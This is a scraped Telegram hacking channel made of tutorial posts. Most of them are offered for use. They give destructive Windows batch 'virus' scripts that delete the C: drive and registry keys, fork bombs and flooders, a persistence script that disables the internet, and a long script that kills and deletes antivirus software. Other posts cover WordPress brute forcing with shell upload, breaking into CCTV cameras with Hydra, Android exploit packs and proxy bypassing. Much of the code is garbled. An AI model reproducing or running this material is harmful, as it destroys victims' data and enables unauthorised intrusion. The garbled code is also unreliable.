UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.8K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
Once we change the function signature, this is how the decompiled code looks like20) Looking at line 23 this makes it obvious that it’s making a request to the strange URL we saw earlier! Line number 24 hints us that, if the request fails, it returns the null handle and then it closes the handle and calls the function FUN_00408090(). This is where all the exciting things are happening. Let me rename that to real_things_happens_here().
If the request doesn’t fail, it simply closes the handle and quits the program. (Line 30–32)🦑

21) Now, if you are wondering, what is this URL, this is the infamous killswitch. This was initially discovered by a hacker Marcus Hutchins aka MalwareTech. He worked on to reverse Engineer the WannaCry and discovered that the ransomware checks for the above URL.

22) Once he registered the domain for himself, it turned out that WannaCry was shut down. It so happened that the domain was unregistered and inactive. Once the ransomware checked the URL and found that it was active, the ransomware was shut down.

This is how basically how it worked!

Don t Copy Our Tutorial Without Permission
@ Mr.BotNet(t.m)
————-UNDERCODE————
--------UNDERCODE-----

🦑 bypass proxy server in LAN:
(T.me/UnderCodeTestingOfficial)

🦑Method 1:

1) Bypassing Via Browsers
When everything else seems all right, the only thing you have to do is disable the proxies in your web browsers.

2) In Firefox, go to “Options -> Advanced -> Connection Settings.”

3) Enable no proxy access, refresh your browser and surf the websites.

4) Chrome users should visit “Settings -> Advanced -> System.” Here, click on “Open Proxy Settings.”


5) A new “Internet Properties” window will open. Click “LAN Settings” and uncheck everything in the second window.

6) Refresh the Chrome browser and surf the website.

🦑Methode 2:

>Command Line Tracert

1) If the above method did not work for you, it means the URLs have been blocked.

2) In such cases you can try accessing the website through its IP address.

> Go to command line, type tracert www.url.com and hit Enter.

3) Soon the website will return its IP address. Enter the IP address on the address bar to access the website.

4)In some admin settings, you might not be able to access the command file. In such a case, simply run

>cmd as a batch file.

5) Open Notepad, type the words cmd and save it as “cmd.bat” in “All files.” This should now run as your command file.

🦑Method 3: Chrome VPN Extensions


1) For Chrome users, another method to bypass the settings is to use VPN extensions. Free VPN is one of the reliable extensions which works well.

2) You can choose from hundreds of extensions and not have to worry about slow speed ad bandwish

🦑Method 4: Fresh Proxies

1) Network administrators have a habit of blocking external proxies. However, that is where “fresh proxies” come in real handy.

2( You can do a simple Google search for them. I personally find “free-proxy.cz” quite useful in discovering new proxy servers.

3) Simply look for a reliable proxy, and note down its IP address and port number.

4) Go back to the LAN settings again, except this time you must check the box for “use a proxy server for your LAN.”

5) Then, insert the values into the required fields and start accessing the website.

🦑Method 5: Use Tor:

1) The Tor browser is one of the best ways to get around proxy restrictions. Freely available, you can surf anonymously and not leave a trace revealing your browsing activities.

2) Tor browsers are also malware-free,but you might want to hide it somewhere if on a shared computer.

🦑Hack Methods/

1) While these methods do not qualify as proxy bypasses, they are quite useful in helping you access what you want.
Use Google Translate: Go to Google Translate and convert the website into another language.

2) Once done, all you have to do is see the “original.” This way you can read the content in English under a new URL. 

3) You can also use Microsoft’s Bing translation service.

@ Mr. BotNet(t.m)
-------UNDERCODE------
————undercOde———-

🦑Hack WordPress WebSites Tested
(instagram.com/UnderCodeTestingCompany)

🦑INSTALLISATION & RUN:

1) git clone https://github.com/n00py/WPForce

2)cd WPForce

3)Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

4)python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

5)For Using i Prefere to get Wordlist at Files SENDED BELow bt UnderCode (4 gb Torrent)

🦑TESTED ON:

1)Ubanto

2) Debian

3) Kali

4) Parrot

🦑FEATURES:

1) Brute Force via API, not login form bypassing some forms of protection

2) Can automatically upload an interactive shell

3) Can be used to spawn a full featured reverse shell

4) Dumps WordPress password hashes

5) Can backdoor authentication function for plaintext password collection

6) Inject BeEF hook into all pages

7) Pivot to meterpreter if needed

Written by Mr. BotNet(t.m.)
———undercOde———
crackstation.txt.gz.torrent
42.3 KB
4 Gb WordlIST crack Torrent @UnderCodeTestingOfficial
- - - - - -undercOde- - - - -

🦑🆆🅷🅰️🆃 🅸🆂 🆆🅴🅱️🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🆅🅸🆁🆄🆂 & 🅷🅾️🆆 🆃🅾️ 🆄🆂🅴 🅱️🆈 🆄🅽🅳🅴🆁🅲🅾️🅳🅴 ?
(t.me/UnderCodeTestingOfficial)

🦑 Let s start with Small Definition:
(Anyone called Hacker should he know this)

1) A web shell can be written in any language supported by the target web server.

2) The most usually observed web shells are written in widely supported languages, such as PHP and ASP. Perl, Python, Ruby, and Unix shell scripts are also used.

3) A web–shell itself cannot attack or exploit a remote vulnerability, so it is always the second step of an attack.

🦑🅷🅾️🆆 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅴🆇🅿️🅻🅾️🅸🆃🆂 🅰️🆁🅴 🆄🆂🅴🅳 🅱️🆈 🅰️🆃🆃🅰️🅲🅺🅴🆁🆂?

1) Web shells are frequently used in trade offs because of the combination of remote access and features. Even simple web hulls can have a huge impact and often maintain a minimal presence.

2)To Gain Persistent Remote Access To Control Server

3)To Execute Privilege Escalation:

Unless a server is misconfigured, the web shell will run under the Web server’s user permissions, which are (or at least should be) limited. Using a web shell, an attacker can attempt to perform elevation of privilege attacks by exploiting local system vulnerabilities

4)To Setup Zombie Botnet For DDOS attacks

🦑🅲🅾️🅼🅼🅾️🅽 🆃🅰️🅲🆃🅸🅲🆂 🆄🆂🅴🅳 🆃🅾️ 🅴🆇🅴🅲🆄🆃🅴 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🅴🆇🅿️🅻🅾️🅸🆃

Web shells can be delivered through a number of Web application exploits or configuration weaknesses, including:

1)SQL injection;

2)Intersite script;

3) WordPress vulnerabilities in applications/services;

4) WordPress file processing vulnerabilities (for example, download filtering or assigned permissions);

5) WordPress vulnerabilities included files (RFI) and local files included (LFI);

6) Exposed administration interfaces (possible areas to find the vulnerabilities mentioned above).

@͓̽ ͓̽M͓̽r͓̽z͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽
——UNDERCODE------
Windows 7 😁
- - - - - - ยภ๔єгς๏๔є- - - - - -

🦑 Set window on top, make it dark, transparent and more auto customize (For all Windows Version):
Paid theme For Free In UnderCode:
(follow us Twitter.com/UnderCodeTC)

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:

1) Download https://github.com/gileli121/WindowTop-Web-Installer/releases/tag/05-31-19

2)The installer will also download for you offline installer.

3) You can use the software in 2 ways:

*Download Autoit and run the WindowTop.au3 file as it is

*Download compiled exe file of the software

🦑🅃🄴🅂🅃🄴🄳 🄱🅈 🅄🄽🄳🄴🅁🄲🄾🄳🄴 🄾🄽:

1)Windows 10

2)Windows 7


🦑Trouble in Install
>https://youtu.be/En9JtAn8nRY

ENJOY 😊


@̶̫̱̍͊͜ ̸̛͠ ̝̹̞̻̩̲M̶̛̪̰̻͎̼̆̄̈́͘̕ṙ̵͚̦̘̦͇͇̣͔̓ͅͅ.̶̍̎ ̩̟̜̟͓͛͐͂͜ ̴̨̙͓̦̫̲̯́̀̉͑̓͛̈̚͠͝ͅB̵̅ ̹o̵̞͇̠̠̜͒́̓̏͒̽̽́͛͝t̷ ̛̲̲͑͗̀n̶̛̐͌̒ ̝͓͎̰̻̦e̴̠͑̆̈́̅͛̈́̐t̴̎̓́ ̠̬͖̮͈͈͇͌ͅ(̵̨̠͉͈̹̞͖͒̈́̽̈́t̴ ̹͒̽̈́̽̒̀̒̕͝.̸̨͓̭̈́̍͒m̶̒ ̢͖͇͚̑.̷̪̩̬̣̬̑̏͋̎

- - - - - - ยภ๔єгς๏๔є- - - - -
- - - - - - -U҉N҉D҉E҉R҉C҉O҉D҉E҉ - - - - - -

🦑░H░o░w░ ░C░r░e░a░t░e░ ░D░a░n░g░e░r░o░u░s░ ░V░i░r░u░s░ ░b░y░ ░u░n░d░e░r░c░O░d░e░:
(Facebook.com/UnderCodeTestingCompanie)

🦑For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.

🦑𝐥𝐞𝐭 𝐬 𝐒𝐭𝐚𝐫𝐭:

1)Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given Written below one by one for the different virus in a different file.

>Code :
@Echo off
Del C: \ *.* || y

>Copy (Ctrl+C) and Paste (Ctrl+V) the source code)

2) I am not responsible for any damage or error reporting on Your PC, do it at your own risk.

3)𝘾𝙤𝙙𝙚𝙨:

A) Disable Internet Permanently

>This code will disable the internet connectivity permanently.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

B) Delete Key Registry Files

This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

C) Endless Notepads

T>his will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

D) ░E░n░d░l░e░s░s░ ░E░n░t░e░r░ ░U░n░d░e░r░C░o░d░e░

This will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

E) Application Bomber

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

F)Folder Flooder

This will create unlimited no. of folders.

@echo off
:x
md %random%
/folder.
goto x

G)User Account Flooder

This will create large no. of the user account on one’s PC and goes on

@echo off
:xnet
user %random% /add
goto x

H) Process Creator

This will create unlimited background processes

%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable

@Echo off
Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem

@̸͇̱̘͆͑́̎͑̆͘͘ͅ ̶̡̤̲̰̲̗̜̈́M̸͇̪̜̃̂̄r̵̋͗̀̎ ̟͖̫̙̪͖̥̦̀̌́̈́͜ͅ.̸̧̛̱̘̝̌͋͗̄̅́̾̌ ̷ ̧̦̫̯̻̻̮̜̈̽͆̋B̴̭͕̲̲̲̎̏̈̍͂͘ͅ o̷͓͓̣̤͆ͅt̷̛̜̹̰̜̦̠͑̓̓͒͠ ̼̲̹N̵̢̩̰̠͊͂̈́̽͜ȩ̶͍̲͙͊̈́͌͑̈́̎̆̕̚t̶͂̋̀̓͠ ͓́͋ ̶̨͙̞̩̞̖̽̌́̾̐̕(̵̩͎͈̹͚͇̘͙͘ẗ̴̟͇́̀͊̐̚ ̼̥̮.̸̘̗͎͊͜͝m̷͆ ̪͔̜̹͊͛̈̾͠.̶̯̥͚̩͐͂̈́̔̀̈́̒)̷̹͕̣̙͙̲̭̍̑̏̈́̒

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
FULL GUIDE PROGRAMMING NOT NOT NESSASARY CREATE DANGEROUS VIRUS NOTPAD☠️
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑˜”*°•.˜”*°• Android-Exploits Tested •°*”˜.•°*”˜
U P D A T E D :
(twitter.com/UnderCodeTC)

🦑░I░n░s░t░a░l░l░i░s░a░t░i░o░n░ ░&░ ░R░u░n░:░

1) git clone https://github.com/sundaysec/Android-Exploits.git

2) Recommend you grab exploitpack latest version

>wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

4) java -jar ExploitPack.jar

5) Load the exploits

🦑 OWASP Top 10 Mobile Risks On Rooted Android Should Carring:


1_Insecure Data Storage
2_Weak Server Side Controls
3_Insufficient Transport Layer Protection
4_Client Side Injection
5-Poor Authorization and Authentication
6_Improper Session Handling
7_Security Decisions Via Untrusted Inputs
8_Side Channel Data Leakage
9-Broken Cryptography
10-Sensitive Information Disclosure

ŴᖇIᵗᵗєn ᵇЎ 𝓂Ř. 𝔟ᵒŦ𝐧ᵉт (𝓣.Ⓜ️.)
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack Any CctV Camera by undercOde:
(t.me/UnderCodeTestingofficiaL)

🦑𝕴𝖓𝖘𝖙𝖆𝖑𝖑𝖎𝖘𝖆𝖙𝖎𝖔𝖓 𝖆𝖓𝖉 𝕽𝖚𝖓:

1) All You need is going inside same network
(example same netprovider or same wifi or wlan network simply go inside same wifi or wlan connected to Camera)

2) Get any Ip Scanner to locate and get the Cam ip
both simple tools work to parrot ubanto or kali and avaible for major os platform and both avaible on github

3)Choose Ip Address Range
Before sanning with arp-scan or angry ip
Choose ip range so go to browser and type what is my ip

4) it s show your public ip
Example here my ip is 213.204.114.62 in Lebanon

So i choose ip range 213.204.114.1
and 213.204.114.200

🦑5) Now :
Go to tools > Preferences > Ports | add ports 80,8080,23 in Port selection tab
It will scan 80,8080 and 23 port.


6) Any ip detection tool (webdetect) will help avaible per default on wireshark or can allow in settings of angryip scanner to show the camera ip

>CCTV camera model name, camera name

7) Now start scan

8) After choosing ip if you lucky for major camera you get default login of any Camera TheN DONE
if not:
Open Hydra The famous bryte force tool :
Type
hydra -s 80 -l admin -P /root/ THEN DIR LOCATION -e ns -t targetIP http*
(LOGIN SITE NAME )

9) Now hydra done we have password login

again open cam login and put name & Pass

>ENJOY THIS ONE ON ANY PRIVATE OR PUBLIC CAMERA
🦑Any doubt Check This videohttps://youtu.be/FaNOVUoHQ0w

ŴᖇIᵗᵗєn ᵇЎ 𝓂Ř. 𝔟ᵒŦ𝐧ᵉт (𝓣.Ⓜ️.)
▁ ▂ ▄ ▅ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▅ ▄ ▂ ▁
- - - - - - ⓊⓃⒹⒺⓇⒸⓄⒹⒺ- - - - - -

🦑BUILD GAMES APK EASY WITH TERMUX:
RECENTLY WE SHARE MANY TOOLS FOR BUILD APK ON TERMUX IN undercOde BY THIS NEW REPO SPECIAL FOR GAME APK BUILD USING TERMUX :
(t.me/UnderCodeTestingofficial)

🦑🄸🄽🅂🅃🄰🄻🄻 & 🅁🅄🄽:

1) cd && git clone https://github.com/sdrausty/buildAPKs

2) cd buildAPKs

3) git submodule init

4) git submodule update sources/games

5) ENJOY

@̷̏͗ ̧̣̩̜̮͔̺̻̙̱̃̄ ̶̜̲̰̪̒M̷̔̓̎̀ ̡̱͕͔̠͈̲͓͙̐r̸̬̠̱͉̱̟̃̆̅͛̾͘͝.̸̉̄̓͛̚ ̡̖̱̣͍̪͙̖̋̈́̑͗ͅ ̸̨̬̱͚͂́̍B̵̀̈́͂̓̽́̈́͗̆̍ ̗ǫ̵̰̜͕͈̼̠̩̞̖́̅̑͗̆̇̕t̷̡̥̰̫͐̓̇͗̋͒͗N̶͕̩̟͐̉͋̔̋̽͌̈́̏e̴͙͇͚̫̘͚͉̤̒́̋̋͐͋̀ ͔t̴͖͉̺͔̟̙͖̉́͘ͅ

- - - - - -ⓊⓃⒹⒺⓇⒸⓄⒹⒺ- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
🦑HACK WIFI ,WEBSITES ,INFORMATION GETHERING, SNIFFING, SPOOFING ,,,MORE...
ALL ON TERMUX:
(intagram.com/UnderCodetestingCompany)

🦑I̾n̾s̾t̾a̾l̾l̾a̾t̾i̾o̾n̾ ̾i̾n̾ ̾L̾i̾n̾u̾x̾ ̾

1) Must Run As ROOT For major tools:

2)git clone https://github.com/thehackingsage/hacktronian.git

3)cd hacktronian

4)chmod +x install.sh

5)./install.sh

6)That's it.. you can execute tool by typing hacktronian

🦑

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py
Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

@̷̏͗ ̧̣̩̜̮͔̺̻̙̱̃̄ ̶̜̲̰̪̒M̷̔̓̎̀ ̡̱͕͔̠͈̲͓͙̐r̸̬̠̱͉̱̟̃̆̅͛̾͘͝.̸̉̄̓͛̚ ̡̖̱̣͍̪͙̖̋̈́̑͗ͅ ̸̨̬̱͚͂́̍B̵̀̈́͂̓̽́̈́͗̆̍ ̗ǫ̵̰̜͕͈̼̠̩̞̖́̅̑͗̆̇̕t̷̡̥̰̫͐̓̇͗̋͒͗N̶͕̩̟͐̉͋̔̋̽͌̈́̏e̴͙͇͚̫̘͚͉̤̒́̋̋͐͋̀ ͔t̴͖͉̺͔̟̙͖̉́͘ͅ

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
Forwarded from UNDERCODER
LEARN C PROGRAMMING FULL UNDERCODE.pdf
1.7 MB
Forwarded from UNDERCODER
Android-Programming-Cookbook UNDERCODe.pdf
8.4 MB
Forwarded from UNDERCODER
ANDROID DEVELOPPERS COURSE UNDERCODE.pdf
16.1 MB